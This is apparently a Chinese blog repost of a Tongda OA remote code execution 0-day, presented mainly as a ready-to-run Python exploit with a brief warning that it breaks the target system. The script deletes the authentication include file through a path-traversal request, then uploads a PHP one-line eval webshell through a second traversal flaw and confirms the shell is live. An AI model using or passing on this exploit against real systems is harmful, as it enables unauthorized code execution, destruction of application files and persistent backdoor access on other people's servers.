通達OA最新RCE漏洞 0Day(附帶exp)
阿新 • • 發佈:2020-08-19
本片EXP復現存在風險,使用後會造成OA系統無法使用
登入後截圖
EXP
import requests target="url" # 修改url引數 payload="<?php eval($_POST['3838']);?>" # 一句話木馬 print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OAView Code") input("Press enter to continue") print("[*]Deleting auth.inc.php....") url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php" requests.get(url=url) print("[*]Checking if file deleted...") url=target+"/inc/auth.inc.php" page=requests.get(url=url).text if 'No input file specified.' not in page: print("[-]Failed to deleted auth.inc.php") exit(-1) print("[+]Successfully deleted auth.inc.php!") print("[*]Uploading payload...") url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./" files = {'FILE1': ('dadada.php', payload)} requests.post(url=url,files=files) url=target+"/_dadada.php" page=requests.get(url=url).text if 'No input file specified.' not in page: print("[+]Filed Uploaded Successfully") print("[+]URL:",url) else: print("[-]Failed to upload file")
python td.py